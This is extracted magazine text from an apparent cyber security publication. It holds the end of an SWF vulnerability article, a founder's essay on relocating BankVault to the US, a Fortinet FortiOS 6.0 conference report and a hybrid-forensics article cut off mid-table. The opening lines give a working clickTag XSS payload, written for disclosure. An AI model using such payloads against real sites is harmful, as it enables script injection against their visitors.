CVE-2017-12439 for more information. Due to length constraints, if you’re wanting more information regarding SWF analysis, visit my blog http:// ret2eax.pw, additionally, the following resource are very informative: https://soroush.secproject.com/downloadable/ flash_it_baby_v2.0.pptx

The above example can be exploited via: ?clickTag=javascript:confirm(document.domain); or ?clickTag=//ret2eax.pw

Australian Cyber Security Magazine | 31

Cover Feature Cyber Security

Moving to Silicon Valley By Graeme Speak

Note from the Editor: The ACSM team recently caught up with Australian entrepreneur, Graeme Speak, who recently relocated to the U.S. to continue the growth and development of his cyber start-up, BankVault. After a short conversation, it seemed important to us that Graeme tells his story, since there are lessons for us all. Graeme agreed to write about his journey from Australia to Silicon Valley, with the intention of helping other Australian entrepreneurs rationalise the value of international reallocation, while hopefully busting a few myths relating to keeping business onshore as opposed to losing them overseas. TC

hen I read about another of Australia’s tech businesses moving to Silicon Valley or London, I often note a subtext in the article about the ‘nation’s loss’, yet for many companies seeking to grow, including my own, it simply had to be considered. For most companies, including BankVault, location is rarely a zero-sum choice, where you simply leave Australian shores forever, and I think that for the long term, Australia would be wise to take a more strategic and holistic view. With global uncertainty forming around the digitisation and automation of many industries, Australia’s capacity to be a good proposition for businesses will invariably need to consider itself in a more global and connected context. Bemoaning the loss of a company overseas overlooks a far bigger game. Australia can and does benefit from the traction that hundreds of Australian businesses gain in Silicon Valley and around the world.

32 | Australian Cyber Security Magazine

The networks, relationships and business activity that connects our industries and cities to the rest of the world are fundamental to the ongoing relevance of our cities, as digitisation takes hold. BankVault spreading its activity between the US and Australia is one small part of that global connectivity. In 2016 when BankVault won the Word Cup Tech Challenge in San Francisco and embarked on our international journey, we just saw it initially as recognition of our technology by Silicon Valley. BankVault is a technology innovation company focused on cyber security. Our technology allows users to sidestep their own local computer, browser and keyboard to conduct banking, crypto-trading or other online transactions securely – regardless of whether hackers or malware have infiltrated your system. We were lucky enough to have turned heads

Cyber Security

in Australia, and quickly gained traction via industry associations in both the real estate and insurance sectors, but other important targets such as the big four banks, while interested, were far too slow to be useful. With only around 100 other banking institutions in Australia, the market here was really not big enough to sustain us. Despite progressing well and signing a major international institution, we still couldn’t get enough support. For many tech start-ups, achieving swift growth often means considering global forays. For BankVault, it really came down to having to go where the market opportunity is - the US - with more than 8600 banks and credit unions. Our World Cup Tech Challenge success earned us a meeting in New York with former Mayor and current cyber security advisor to the White House, Rudy Giuliani. The east coast financial space started to seem like a good fit for our technology, so we decided to participate in FD Global’s NYC Immersion Program, triggering a whirlwind of activity that still hasn’t slowed down. In New York, we secured further investment and appointed our first channel partner to target the high number of finance businesses there. This partner alone has direct relationships with 850 banks. That’s 8 times more than Australia, but still only 10 percent of the market in the US. On the technology side the west coast still, in my option, dominates the US. I have always had a strong network in San Francisco, so establishing a presence there for BankVault kept me in touch with our growing business on the east coast, but also enabled me to tap the tech ecosystems of Silicon Valley. I managed to secure a long-term visa, so I'm now fully committed to building the US opportunity. Most recently, in San Francisco we’ve partnered to launch into the cryptocurrency space, with a solution to stop wallets and crypto-exchange logins being hacked - there's at least $10 million dollars of cryptocurrency stolen every week. The other big markets in Europe and Asia will be next for us – if we can find the right channel partners. Once again it will come down to good connections and the value of networks. When I look at how far I’ve progressed, it's all been because of the support of other people. The deeper my network gets (and I mean meaningful relationships with good people) the more effective I become. I want to see Australia grow on the world stage, particularly in tech, but I’m exhausted by attitudes that simplify tech businesses pursuing opportunities overseas as ‘losses’. It’s never quite so straight forward. In my opinion it’s healthy for a company to grow outside of Australia. It’s like young adults going backpacking, it opens their horizons far more than they could imagine. Ultimately, I believe Australian's are generally good at staying connected to Australia, and they’ll tend to want to help fellow Australians if they can. I can’t help but think that when you look at BankVault and the thousands of other Australian businesses and Australian workers living in cities across the world, there is an amazing resource that connects the world to Australia. They’re often lamented as our best and brightest, so perhaps we should look at this so-called weakness, as something of a national strength.

What Australia could do better is to leverage these networks deeply for the benefit of Australia and Australian businesses. Many countries seek to do such things, and of course, for Australia, we have many stakeholders’ public, private and not-for-profit, working hard at it too. Overseas, much of that work is done by Austrade, that does some good work through its international offices, mission programs and business landing pads, helping to create a receptive environment for Australians venturing overseas and build opportunities for Australian businesses and industries back at home. Shortly BankVault will join the Austrade-AusCyber delegation at RSA in San Francisco, a great chance for Australian cyber-businesses and industry people to develop opportunities in region, promote Australia, and build our connections with the US. With increasing digitalisation and automation of many industries across the world, the competition for jobs and the companies that offer them is stiffening. Historically Australia has been able to get by on the back of vast commodity trade and export capacity, but with fewer jobs in these sectors, we’re being forced like everyone else to consider jobs for the future. Most nations have recognised their future prosperity is linked to technology and innovation, and they’re competing aggressively to capture jobs that relate. Efforts to attract, create and compete for jobs are becoming incredibly sophisticated. Some countries have committed to holistic, nation-wide strategies that integrate a vast range of areas ranging from industry development projects through to business grants and attraction incentives, visa and migration schemes, education programs, taxation schemes, housing and accommodation solutions, business incubation and acceleration supports, marketing campaigns and services, industry events, venture capital incentives, diplomatic support, business development, and so on. Imagine how Australia would be if we never traded or allowed immigration. Imagine how sheltered our children would be if they never travelled. The same goes for entrepreneurs. With BankVault I’ve often felt like someone who jumped off the edge simply hoping things would work, and I inevitably found people reaching out to offer support. The global experience and connections I’ve built will always be biased towards home, and as the company continues to grow, Australia will always be a strategic part of the business – of what I hope will eventually be a much bigger business. The benefit flows back in many ways. When you can appreciate the lengths that other countries are prepared to go to compete for jobs, Australia being more competitive surely begins by overcoming any hang ups we still have that ‘preventing losses’ is a realistic or even adequate approach.

Australian Cyber Security Magazine | 33

Cyber Security

Fortinet’s security transformation plans Being successful in digital transformation requires a step change in cyber security

By Tony Campbell EDITOR

t the annual partner conference in Las Vegas, dubbed Accelerate 18, Fortinet showed off their latest products and new features built into FortiOS 6.0. This is the first major release in three years of Fortinet’s proprietary network and security operating system and brings enhanced network visibility, automated threat detection and threat mitigation, as well as a complete SD-WAN implementation included in the base license cost. This is a big deal for Fortinet customers, since they could potentially use their existing investment to build a software defined wide area network and ditch their expensive telco-provisioned MPLS network, thus saving thousands of dollars. By raising the bar with FortiOS 6.0, Fortinet hopes to assist their channel partners and MSSP partners, on multiple levels against their rival service providers, helping both parties take valuable market share. Furthermore, each new feature is woven into Fortinet’s security fabric, so the telemetry from each product can orchestrate incident response actions across the fabric.

34 | Australian Cyber Security Magazine

Keynote Themes Digital transformation was a core theme across the entire conference. Ken Xie, Fortinet’s founder and CEO, discussed his company’s evolution since the early days of Unified Threat Management (UTM) in 2002, to 2016 when the security fabric was introduced. At each company inflection point, Fortinet anticipated the needs of the market and changed course accordingly. By 2016, enterprise technology was going through a renaissance period, with organisations pivoting to on-demand consumption models, and with hybrid cloud becoming the norm, Fortinet needed to again change course. Two major changes in business technology required resolutions in the security fabric to help modern businesses stay safe. The move to public and hybrid cloud means organisations no longer have a perimeter that is well-defined, so a way to protect information, wherever it is, needed to be introduced. Furthermore, the interconnectedness of IT and OT environments, and the

Cyber Security

"Digital transformation is creating new operating and service delivery models that provide undeniable value to users through technologies such as IoT, mobile computing and cloud-based services, generating a vast digital attack surface. As the speed and scale of cyber threats expands, security must take on its own transformation by integrating into all areas of digital technology and be able to translate user intent into automated business response. FortiOS 6.0 delivers hundreds of new features and capabilities that were designed to provide the broad visibility, integrated threat intelligence and automated response required for digital business."

- Ken Xie, founder and chief executive officer at Fortinet

rapid on-boarding of millions of Internet of Things (IoT) devices in the enterprise, have come together to create the perfect storm. Businesses are now more exposed than they’ve ever been to attacks coming from almost any battlefront. Fortinet’s answer is a layered one, with several new products in their portfolio as well as feature uplifts in FortiOS 6.0 that complement each other and help extend security into these new areas of concern. The focus has shifted to protecting data rather than systems and Xie’s tag line summarises this well, “Security from the ground up and end to end.”

catalogue allowing Fortinet customers to benefit from free security and networking on their the WAN, including many of the features you expect from a telco provided WAN solution, such as quality of service. It can network anywhere there is an Internet connection, using 3G/4G and private WAN links, so this makes WAN architectures much easier to implement across existing connectivity. Features of Fortinet’s SD_WAN implementation are as follows:

What’s New?

3. 4.

The two big product announcements were software defined wide area networking (SD-WAN) and their new cloud access security broker (CASB). Both of these products extend Fortinet’s reach beyond where their products go today. SD-WAN is an anticipated extension of Fortinet’s product

1. 2.

5. 6.

Replacement of traditional WAN routers, WAN optimisation and WAN security appliances; Application aware and with support for over 3000 applications; Granular latency status, jitter and packet-loss monitoring; Multi-broadband technology support for Ethernet, DSL and LTE – this allows customers to switch from MPLS thus saving money;x Centralised management; Fully integrated next generation firewall – certified by NSS Labs.

Australian Cyber Security Magazine | 35

Cyber Security

Ken Xie, founder and chief executive officer at Fortinet

Of course, even Fortinet would say that their SD-WAN technology is not yet best in class, but if you don’t need the capabilities of the more sophisticated products, having it for free in FortiOS 60 certainly gives you options you might not have considered. The second major product announcement, which sent murmurs of excitement around the auditorium, was their CASB product. No surprises for what the product is called, but FortiCASB comes as a subscription service designed to provide visibility, compliance, data security, and threat protection for cloud-based services. They already have support for several major SaaS providers, with FortiCASB able to control and monitor users, behaviours and data stored in the cloud. This will again reduce the number of security vendors organisations need to use and pull data and telemetry back to one console, so that security analysts and the SOC has one interface for protecting the organisation’s data, wherever it is. Integrations with Microsoft Azure, Google Cloud, Amazon AWS, Salesforce, Dropbox and Box all exist, and direct API access to all of these partner services allows complete control over the user tenancy. The CASB includes: 1. 2. 3. 4. 5. 6.

User behaviour and user activity monitoring; API access to SaaS services; Reporting and analytics for cloud usage and risk; Access security and entitlement management; Compliance management with predefined policies and audit reports; Subscription based consumption model with no installation required.

Services vs Products Fortinet has always had a channel sales model, and as such they recognise that the best way to grow their own business is to focus on their products integrating well into managed service providers’ service models. One specific

36 | Australian Cyber Security Magazine

session of note, delivered by Fortinet’s Stephen Tallent and Sony Kogin, focused on how MSSPs’ business models can be accelerated using the new features in FortiOS 6.0. For example, SD-WAN is a service that non-telco MSSPs could now offer, adding it to their service catalogue with little to no difficulty, allowing them to directly take business from the telco monopoly on WAN provision. Upskilling MSSP engineering teams to manage SD-WAN is easy, since the product set is intuitive and management interfaces are familiar to Fortinet administrators. Fortinet has already established a new MSSP support team to assist partners and MSSPs in extending their service catalogue with these new service offerings. This covers the technology aspects of the service, as you would expect, but they will also help with financial modelling and staff training, so it’s a complete MSSP accelerator service. They claim that if existing MSSPs follow their model, they can grow their business by up to 13% year on year with new offerings. The global IoT and OT markets see revenues of over $9 billion (USD) per year, and the global cloud services market is valued at over $2 billion (USD) per year, so these are great sources of growth and revenue for any MSSP that wants their fair share. “Helping our mutual channel partners stay one step ahead of the constantly evolving cybersecurity market is a commitment Fortinet and Ingram Micro share. We’ve collaborated closely to deliver advanced security solutions for those partners, pairing offerings such as FortiGuard AI with our expertise throughout the security sales cycle. Our objective is to provide channel partners with the technology, services and support they need to serve as trusted security advisors in today’s increasingly hostile threat landscape.” Eric Kohl, vice president, advanced solutions & networking, Ingram Micro

Automate, Automate, Automate We know that automation saves money, so let’s take a look at the new automation features in FortiOS 6.0. Over the past few years, we’ve heard much about the value threat intelligence (TI) brings to security operations. Yet, TI hasn’t really delivered on its promises. The vast amount of TI SOCs ingest tends to leave analysts drowning in data and alerts, which only serves to reduce their capability. At FortiGuard Labs, their threat researchers are analysing a wide array of security threats, including malware, botnets, mobile threats, and zero-day vulnerabilities and the TI they create is shared with Fortinet’s threat intelligence partners. The TI feed is also used to inform SOC analysts and FortiGate users when known threats are found within environments they protect. With FortiOS 6.0, Fortinet has introduced an automation engine, so that steps for incident response can be triggered when particular conditions are met. This means actions, such as running scripts, quarantining devices or switch ports, and sending alerts, are now possible using orchestration tooling. This is the first release of this new automation capability within the security fabric, but I’m positive that further development in this area will finally see TI and incident response converging into a defensive force to be reckoned with.

Cyber Security

"Helping our mutual channel partners stay one step ahead of the constantly evolving cybersecurity market is a commitment Fortinet and Ingram Micro share. We’ve collaborated closely to deliver advanced security solutions for those partners, pairing offerings such as FortiGuard AI with our expertise throughout the security sales cycle. Our objective is to provide channel partners with the technology, services and support they need to serve as trusted security advisors in today’s increasingly hostile threat landscape." - Eric Kohl, vice president, advanced solutions & networking, Ingram Micro John Maddison - Sr. Vice President, Products and Solutions, Fortinet

Advanced Threat Protection and Compliance Another aspect of the conference that featured heavily both in the keynotes and the technology exhibition hall was Fortinet’s Advanced Threat Protection (ATP) and their approach to addressing the new GDPR regulations that came into force in May 2018. As we all know, GDPR increases regulatory mandates. Fortinet says that the FortiGuard Security Rating Service provides expanded audit rules, and customised auditing, based on network environments, and on-demand regulatory and compliance reports. This can be used to help mitigate some of the risks relating to maintaining compliance against GDPR. In terms of other ATP measures, the FortiGuard Virus Outbreak Service (VOS), “closes the gap between antivirus updates with FortiCloud Sandbox analysis to detect and stop malware threats discovered between signature updates before they can spread throughout an organization.” Again, this theme of integration into the fabric is common across the entire set of product announcements and further strengthens Fortinet’s position as a market leader in the end-to-end protection space. Other features worth a mention are: •

•

The FortiGuard Content Disarm and Reconstruction Service (CDR). This proactively strips potentially malicious content from Microsoft Office and Adobe files and sanitises the most commonly used file formats for spreading malware. FortiGuard’s Indicators of Compromise (IOC) Service uses a continuously updated list of known “bad elements” and scans devices connected to their Security Fabric to identify compromised devices. The FortiSandbox ATP for Amazon Web Services, available as on-demand and BYOL, defends against advanced threats in the cloud, working alongside network, email, endpoint and other security services.

Fortinet's Security Fabric

Security Management and Incident Response Several new Incident Response (IR) lifecycle capabilities were shown to integrate into the Security Fabric to allow users to automate responses, based on predefined triggers (system events, threat alerts, user and device status) or through direct ITSM integration – they talked multiple times about their relationship with ServiceNow. Automation in terms of response methods allows security managers to quarantine, notify, or even change the configuration of security technologies, all underpinned with clever signalling (email, SMS, alerts to the SIEM, etc.) and custom reporting with real-time control of their workflow environments. Automated attack surface hardening provides recommendations and trending reports on security compliance and best practice adoption, so again this can be aligned with your OAIC, PSPF or GDPR compliance framework and can be used to benchmark your systems against similar firms in terms of size, industry and region.

Australian Cyber Security Magazine | 37

Cyber Security

Hybrid Forensics: Dealing with massive data volumes and large networks

P By Richard Adams

ractitioners working in the fields of forensics, eDiscovery and IT security are faced with several issues when dealing with multiple endpoint processing. If the typical eDiscovery/forensics approach is adopted then this has a significant negative impact on network infrastructure, due to the collection of massive amounts of (mostly useless) index data to a central point. Notwithstanding the unreliability of indexing, this is also a very slow process and requires network administrators to allow â&#x20AC;&#x2DC;agentsâ&#x20AC;&#x2122; to be installed on the targeted endpoints. A further problem with this approach is that the tools interact directly with the host operating systems and therefore may be denied access to certain files being used by the system or other applications. Hybrid Forensics is an approach designed to address these problems. It combines the ability to process multiple endpoints as a single task together with the ability to target system and application artefacts, without interference by the operating system, e.g. registry information, locked files (such as email containers) and unknown executable files.

38 | Australian Cyber Security Magazine

A key aspect of the Hybrid Forensics approach is to run a collection tool with the capability to undertake literal string searches at a disk level (rather than an operating system level), with the code running entirely in memory on each custodian, i.e. it is not installed. This provides four significant benefits: 1. Deployment is fast, easy and doesnâ&#x20AC;&#x2122;t require the participation of custodians. 2. Only responsive data is ever moved across the network, reducing the effect on network infrastructure. 3. The search process is much more effective and will find responsive material missed by the index approach, e.g. because of language issues or other indexing restrictions. 4. The speed of collection is increased, as all processing and collection is carried out in parallel, rather than individually or in small batches (a typical approach to reduce network load by queuing up jobs).

Cyber Security

'The name given to the new tool was ISEEK, which is an application that runs entirely in memory and directly accesses data on storage devices.,' By leveraging the capabilities of ISEEK, security professionals now can now carry out ad hoc searches across their networks for any form of data. In addition, a new approach to detecting suspicious files has been identified. The new approach comes from the following thought process: • To carry out its malicious activity, malware must give instructions to the operating system. • We know what forms these instructions must take. • By searching for files containing these instructions, regardless of their file extension, we can identify all executable code on a system.

Applying the hybrid forensics approach iseek In 2013 a patent was awarded that defines the Hybrid Forensics approach. The title of the patent was “Method and System for Searching for, and Collecting, ElectronicallyStored Information”. To put the approach covered by the patent into practice a new application had to be developed that could run concurrently on an unlimited number of systems, without having to be installed, while also being capable of searching data storage devices without relying on the operating system for access to files. The name given to the new tool was ISEEK, which is an application that runs entirely in memory and directly accesses data on storage devices. A suite of tools was also developed that includes ISEEK-Designer, which creates an encrypted configuration file containing the search/collection parameters, and ISEEK-Explorer, which opens the encrypted containers in which are stored the audit results and collected data for viewing and potential further processing.

Data of interest can be obtained from a selection of welldefined sources depending on the type of investigation, such as email (both application-specific and webmail), user files, system files (including the registry on Microsoft Windows machines) or deleted files. The collected data can be sent to an encrypted container on a device physically attached to the target system, while it is still running (even still in use). Alternatively, the data can be sent to an encrypted container located on a network share or even a cloud location. The Hybrid Forensics process can be replicated on as many systems as necessary. These processes run in parallel utilising the resources of each host system. Distributed collections can be undertaken by several means, including: 1. Using a deployment agent such as EasyDeploy to run PSExec instances on networked systems that will load and execute the hybrid tool; 2. Sending a disk containing the hybrid tool plus its configuration file to one or more users at the remote site, where it can be replicated and deployed as necessary by a system administrator or consultant with the appropriate access. The data will be sent to a specified target location; 3. Sending the hybrid tool plus its configuration file to a system administrator at the remote site, who can deploy the tool from a network share and login script, with the data being sent to an accessible location or using PSExec; and 4. A System Administrator using an RDP session to connect to the remote systems to run the tool manually.

Practical application An experiment to demonstrate the effectiveness of the new process and associated technology was carried out using nine custodian systems running a combination of Windows 10, Windows 10 Enterprise, Windows Server 2012 and

Australian Cyber Security Magazine | 39

Results of ISEEK deployment to nine custodian systems in a Windows domain Machine

Searched data

Responsive data

Number of files searched

Responsive Files

Responsive Emails

Time to complete

WS-1

527 MB

3,578

00:00:45

TRID

14 GB

3,772

00:02:53

WIN-2

9 GB

22 MB

84,259

00:03:21

WIN-1

13 GB

45 MB

239,017

114